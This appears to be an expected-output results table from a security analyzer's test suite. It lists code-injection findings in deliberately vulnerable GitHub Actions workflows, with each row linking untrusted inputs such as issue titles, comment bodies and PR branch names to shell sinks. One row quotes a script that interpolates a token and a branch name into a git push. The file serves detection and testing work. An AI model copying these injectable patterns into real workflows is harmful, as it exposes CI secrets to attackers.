| github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | 